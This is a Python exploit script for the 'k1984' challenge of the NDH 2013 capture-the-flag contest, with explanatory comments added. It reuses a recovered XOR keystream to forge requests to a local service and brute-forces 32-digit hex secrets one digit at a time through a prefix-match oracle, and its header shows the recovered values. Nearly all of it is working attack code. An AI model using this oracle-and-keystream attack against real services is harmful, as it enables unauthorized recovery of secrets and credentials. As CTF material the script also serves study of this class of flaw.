#!/usr/bin/python
# Exploit for k1984
# Aris Adamantiadis (les pas contents)
# unfortunately coded a few hours after the CTF was over :(
# aris@kali64:~/ndh2013$ python xp.py
# found 05:8efc22fcc45fc5901f1bbce521f29bc1
# found 06:98adbaaef36e718f479db3b8dad331c9
# found 13:7da8b66f82aeba067e33859583c4153f
# found 17:083d5f3bcd7c0b39e473844f1326decf
# found 20:3856bd0cbb94460c113259b0b83d9049
# found 35:167f0dbb43c6430cd2d3b4e8f79dd769
# found 46:840c653d087e8e1821b1903f0981ae2d
# found 52:3f45067f05fb180b8f0014a23648d677
# found 64:e17cc98f772d417a3ce261df512c2ab4
# found 99:2385ba276005a5e2098c0acb9bdf8f07
import binascii
import socket
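# 96-byte XOR mask that try_pass applies to every request before sending it.
# How it was obtained is not shown in this file -- presumably keystream
# recovered from the service. Because the same mask is reused for each
# message, the attacker can encrypt arbitrary chosen plaintexts, which is
# what the prefix search below relies on.
crypted = (
    "8f d9 4d 70 a9 ce 04 bb 7b a9 7f dd 63 2d 23 8e"
    "52 bc dc 0b ab 8b d9 f0 f7 05 5e 60 84 e7 63 47"
    "fe c2 ce 99 10 c7 aa cc ac 65 b2 c8 f8 c3 6e e0"
    "d9 cd aa a3 f6 57 17 31 52 a6 58 0b 46 8f 91 e9"
    "11 20 c1 38 4e c4 21 0c 56 4c 77 32 e6 bf 80 bb"
    "d3 5c cc 9c d8 fc 1d 9e 44 a4 25 a8 5f cb fa 96"
)
# binascii.unhexlify is the portable form of the Python-2-only
# str.decode("hex") codec (removed in Python 3); the result is a byte string.
crypted = binascii.unhexlify(crypted.replace(" ", ""))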
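def xor_strings(xs, ys):
    """XOR the plaintext ``xs`` against the mask ``ys`` byte by byte.

    Returns a byte string of ``len(xs)`` (str on Python 2, bytes on 3).
    The mask must be at least as long as the plaintext: the previous ``zip``
    implementation silently truncated the result to the shorter input, which
    would send a clipped frame to the oracle and surface as a false
    "no match" instead of an error.

    Args:
        xs: plaintext byte string.
        ys: mask byte string, ``len(ys) >= len(xs)``; extra bytes are ignored.

    Returns:
        ``xs`` XORed with the first ``len(xs)`` bytes of ``ys``.

    Raises:
        ValueError: if the mask is shorter than the plaintext.
    """
    if len(ys) < len(xs):
        raise ValueError(
            "xor mask shorter than plaintext (%d < %d)" % (len(ys), len(xs))
        )
    # bytearray iterates as ints on both Python 2 and 3, so no chr/ord dance;
    # bytes(bytearray) is str on 2 and bytes on 3, matching what send() wants.
    return bytes(bytearray(a ^ b for a, b in zip(bytearray(xs), bytearray(ys))))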
# Rebound by the search loop below before it is ever read; kept only so the
# module-level name still exists.
offset = 65

# One plain TCP connection to the local oracle, reused for every probe.
# NOTE(review): no socket timeout is set, so a service that stops answering
# makes the recv() in try_pass block forever.
s = socket.create_connection(("127.0.0.1", 2001))
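def try_pass(offset, string):
    """Ask the oracle whether ``string`` is an acceptable hex prefix for slot ``offset``.

    Builds the fixed request frame, XORs it with the recovered mask
    ``crypted`` and sends it on the module-level socket ``s``. The reply is
    treated as a hit when it contains the text "True" -- that per-request
    yes/no answer is the oracle the digit-by-digit search exploits.

    The header expressions below are just obfuscated constants: they
    evaluate to the bytes 0x4e 0x04 0x08 0x0a, then the two ASCII decimal
    digits of ``offset``, then 0x1a; a NUL terminates ``string``. The frame
    is at most 8 + len(string) bytes, well inside the 96-byte mask.

    Args:
        offset: slot number; the caller uses 0-99 (two decimal digits are
            encoded, larger values produce non-digit bytes exactly as before).
        string: lowercase hex prefix guessed so far.

    Returns:
        True if the reply contains "True", False otherwise.
    """
    # // instead of /: plain / is integer division only on Python 2 without
    # `from __future__ import division`; elsewhere chr() would get a float.
    payload = (
        chr(0x9C // 2) + chr(0x10 // 4) + chr(0x40 // 8) + chr(0xa0 // 16)
        + chr(ord("0") + offset // 10) + chr(ord("0") + offset % 10)
        + chr(0xd0 // 8)
        + string + "\x00"
    )
    # sendall: send() may write only part of the frame, and a truncated
    # request is also XOR-misaligned from the oracle's point of view.
    s.sendall(xor_strings(payload, crypted))
    # NOTE(review): a single recv() can return a partial reply; the CTF service
    # answered in one segment, so reassembly is not attempted here.
    x = s.recv(256)
    return b"True" in x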
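# Recover, for each of the 100 slots, the hex string the oracle accepts.
# One hex digit is probed at a time (16 guesses per position instead of
# 16**32 for a whole 32-digit string); this only works because the service
# confirms a correct *prefix* with "True" -- a classic answer oracle that a
# constant-time, whole-value comparison would close.
for offset in range(100):
    string = ""
    for position in range(32):
        for c in range(16):
            guess = "%x" % c
            if try_pass(offset, string + guess):
                string += guess
                break
        else:
            # No digit extended the prefix, so nothing more can be learned
            # for this slot. The previous loop only stopped when the *first*
            # digit failed; a failure later on re-sent the same 16 dead
            # probes for every remaining position.
            break
    if string:
        print("found %.2d:" % offset + string)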